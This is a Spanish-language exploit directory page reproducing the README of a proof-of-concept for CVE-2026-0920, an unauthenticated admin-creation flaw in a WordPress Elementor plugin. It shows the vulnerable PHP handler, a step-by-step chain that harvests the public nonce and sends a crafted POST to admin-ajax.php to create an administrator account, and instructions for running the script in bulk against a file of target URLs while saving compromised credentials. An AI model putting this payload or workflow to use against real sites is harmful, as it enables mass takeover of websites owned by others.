Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-0920- — LA-Studio Element Kit for Elementor <= 1.5.6.3 - Escalada de Privilegios No Autenticada mediante Backdoor para la Creación de Usuarios Administrativos vía el parámetro lakit_bkrole | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2026-0920-
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebAprendizaje y Educación
GitHubnxploited/cve-2026-0920-

CVE-2026-0920-

LA-Studio Element Kit for Elementor <= 1.5.6.3 - Escalada de Privilegios No Autenticada mediante Backdoor para la Creación de Usuarios Administrativos vía el parámetro lakit_bkrole

Ver Repositorio
217hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-0920-

LA-Studio Element Kit para Elementor <= 1.5.6.3 - Escalada de privilegios no autenticada mediante puerta trasera para la creación de usuarios administrativos a través del parámetro lakit_bkrole

   _____   _____   ___ __ ___  __      __  ___ ___ __  
  / __\ \ / / __|_|_  )  \_  )/ / ___ /  \/ _ \_  )  \ 
 | (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
  \___| \_/ |___| /___\__/___\___/    \__/ /_//___\__/ 

Telegram CVE CVSS Python License


📡 El exploit se publica aquí primero. Sigue a @KNxploited en Telegram: tu fuente de élite de CVEs recién divulgados, PoCs funcionales e investigación de seguridad de precisión. Actualizada sin descanso. Diseñada para quienes se mantienen a la vanguardia.


🧠 Descripción general

CVE-2026-0920 es una vulnerabilidad CVSS 9.8 Crítica descubierta en el plugin de WordPress LA-Studio Element Kit for Elementor.

La falla reside en la función ajax_register_handle(), que procesa registros de usuarios no autenticados mediante AJAX. La función no aplica ninguna restricción sobre el parámetro lakit_bkrole, lo que permite a un atacante completamente no autenticado autoasignarse el rol administrator durante el registro, logrando la toma de control total del administrador de WordPress en una sola petición.

CampoDetalles
ID CVECVE-2026-0920
PluginLA-Studio Element Kit for Elementor
Sluglakit / la-studio-element-kit-for-elementor
Versiones afectadasTodas las versiones hasta la 1.5.6.3 inclusive
Tipo de vulnerabilidadEscalada de privilegios no autenticada / Creación de administrador
Vector de ataqueRed — no se requiere autenticación
Puntuación CVSS 3.19.8 CRÍTICA
Vector CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ImpactoToma de control total del administrador de WordPress
InvestigadorNxploited

💀 Análisis en profundidad de la vulnerabilidad

La causa raíz es la ausencia de una comprobación de capacidades de rol dentro del manejador de registro AJAX del plugin:

// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);

public function ajax_register_handle() {
    $actions = json_decode(stripslashes($_POST['actions']), true);

    foreach ($actions as $req) {
        if ($req['action'] === 'register') {
            $data = $req['data'];

            $user_data = [
                'user_login' => $data['username'],
                'user_pass'  => $data['password'],
                'user_email' => $data['email'],
                'role'       => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
            ];

            // No validation of $data['lakit_bkrole'] against allowed roles
            wp_insert_user($user_data); // Administrator created silently
        }
    }
}

Por qué esto es crítico:

  • wp_ajax_nopriv_* = accesible por cualquier persona sin autenticación alguna
  • lakit_bkrole acepta cualquier cadena de rol de WordPress, incluido administrator
  • Una sola petición POST crea una cuenta de administrador con plenos privilegios
  • El nonce requerido está expuesto públicamente en el HTML/JS del front-end del sitio
  • Sin limitación de velocidad (rate limiting), sin aplicación de CAPTCHA por defecto, sin requisito de verificación por correo electrónico

⚔️ Cadena de explotación

Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)

Search HTML/JS for:
  "ajaxNonce": "<value>"         ← Inline JSON config
  ajaxNonce: '<value>'           ← JS variable
  data-ajaxnonce="<value>"       ← HTML attribute

Nonce is publicly accessible — no login required.
  ↓
ajaxNonce extracted ✔️

──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php

  action  = lakit_ajax
  _nonce  = <extracted nonce>
  actions = {
    "req1": {
      "action": "register",
      "data": {
        "email":                  "[email protected]",
        "password":               "adminSA",
        "username":               "Nx_admin",
        "lakit_field_log":        "yes",   ← use supplied username
        "lakit_field_pwd":        "yes",   ← use supplied password
        "lakit_field_cpwd":       "no",    ← skip password confirm
        "lakit_bkrole":           "1",     ← trigger admin role injection
        "lakit_recaptcha_response": ""
      }
    }
  }
  ↓
Administrator account silently created ✔️

──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
  log = Nx_admin
  pwd = adminSA
  ↓
Session cookies obtained → GET /wp-admin/plugin-install.php
  ↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️

⚙️ Requisitos

pip install requests colorama
DependenciaPropósito
requestsPeticiones HTTP, manejo de sesiones, gestión de cookies
coloramaSalida de terminal en color en todas las plataformas
threadingProcesamiento concurrente de múltiples objetivos
reExtracción de nonces basada en expresiones regulares desde HTML/JS

Se recomienda Python 3.10+ (usa sugerencias de tipo unión str | None).


📂 Estructura de archivos

CVE-2026-0920/
├── CVE-2026-0920.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: pwned targets + credentials

🚀 Uso

Paso 1 — Configurar credenciales (opcional)

Abre CVE-2026-0920.py y edita las constantes de la parte superior para establecer los detalles de tu cuenta de administrador deseada:

ADMIN_EMAIL    = "[email protected]"   # Email for the new admin account
ADMIN_PASSWORD = "adminSA"                 # Password for the new admin account
ADMIN_USERNAME = "Nx_admin"               # Username for the new admin account

Paso 2 — Preparar los objetivos

Crea list.txt con una URL de objetivo por línea:

https://target1.com
https://target2.com
http://target3.com

Las URLs sin esquema reciben automáticamente el prefijo https://.


Paso 3 — Ejecutar el exploit

python CVE-2026-0920.py

Se te solicitará:

Descargar herramienta